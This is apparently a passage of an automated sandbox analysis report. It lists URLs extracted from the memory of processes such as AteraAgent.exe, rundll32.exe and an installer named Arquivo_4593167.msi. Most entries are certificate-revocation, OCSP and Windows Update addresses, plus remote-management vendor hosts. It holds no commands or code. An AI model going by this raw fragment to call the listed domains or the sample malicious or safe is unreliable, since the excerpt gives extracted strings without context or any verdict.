                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C7C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD21EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C8F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA055000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA31E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2A2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl8
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/l
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlrlCache
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/-
                                Source: AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/2_h
                                Source: AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Pw
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Q
                                Source: AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/VbN
                                Source: AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/cb
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2935401771.0000016BD0D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/e
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabon
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?1908e7e
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA23D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3d5ae80
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?43a390c
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6c9e1dd
                                Source: AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?7160e0b
                                Source: AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9bd3f2b
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?a2b53af
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?b87e0f2
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cabf
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?7160
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9bd3
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?c37a
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d17kmd0va0f0mp.cloudfront.net
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d25btwd9wax8gu.cloudfront.net
                                Source: AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://dl.google.com/googletalk/googletalk-setup.exe
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.splashtop.com
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1954314035.000001BE6236E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1954314035.000001BE6236E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A09B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://my.splashtop.com
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/dummynamespace/
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/3
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/5
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT
                                Source: NLog.dll.24.drString found in binary or memory: http://nlog-project.org/ws/T
                                Source: AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digi
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/3
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2267142526.0000020AA082C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2977989591.0000016BEA6C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978250326.0000016BEA6DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rh
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/X
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/l-
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/lN
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C8F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA055000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA31E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1956064131.000001BE7B4B8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2203027448.000002E967DA9000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2084912382.0000022D4CAAB000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000002.2087026675.0000022D4CADE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2085700686.0000022D4CADE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2084621827.0000022D4CAA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.dr, System.Diagnostics.Process.dll.24.dr, Microsoft.Extensions.FileSystemGlobbing.dll.24.dr, System.Runtime.InteropServices.dll.24.dr, System.Text.Encodings.Web.dll0.24.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://ocsp.digicert.com0K
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://ocsp.digicert.com0N
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://ocsp.digicert.com0O
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                                Source: AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigning
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C6E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA269000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
                                Source: AteraAgent.exe, 00000018.00000002.2978250326.0000016BEA6DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5955000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B76000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB97D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlV
                                Source: xdnup.dll.1.dr, stdpms.cat.1.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.atera.com
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CC3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.pndsn.com
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                                Source: xdnup.dll.1.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: xdnup.dll.1.drString found in binary or memory: http://s2.symcb.com0
                                Source: AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                                Source: AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/
                                Source: System.Private.DataContractSerialization.dll.1.drString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Collections.GenericJ
